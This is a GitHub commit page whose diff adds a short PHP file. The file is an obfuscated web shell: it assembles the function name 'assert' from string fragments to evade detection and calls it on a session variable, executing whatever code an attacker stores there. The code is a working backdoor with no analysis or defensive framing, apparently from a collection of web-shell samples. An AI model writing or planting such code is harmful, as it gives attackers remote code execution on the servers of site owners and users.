tennc 2022-09-09 23:12:00 +08:00 committed by GitHub
parent 4837a655b7
commit 33e854d721
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

8
php/2022-09-09-03.php Normal file
View file

@ -0,0 +1,8 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c($_SESSION['dmeo']);
?>